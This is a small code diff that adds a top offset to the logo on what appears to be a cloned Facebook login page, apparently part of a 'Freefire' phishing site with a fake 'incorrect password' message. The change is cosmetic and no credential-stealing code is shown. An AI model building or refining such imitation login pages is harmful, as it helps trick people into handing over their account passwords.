--- a/facebook/index.html
+++ b/facebook/index.html
@@ -118,7 +118,7 @@
 <body>
     <script src="script.js"></script>
     <div class="msg"id="msg"style="color:red;display:none;"><p>Your password or username are incorrect</p></div>
-    <div style="position:fixed;">
+    <div style="position:fixed;top:5px;">
         <center><img src='https://sharmapushkar-coder.github.io/Freefire/facebook.svg'title="Facebook-logo-svg"style="width:120px;100px;"></center>
     </div>
     <div class="container">
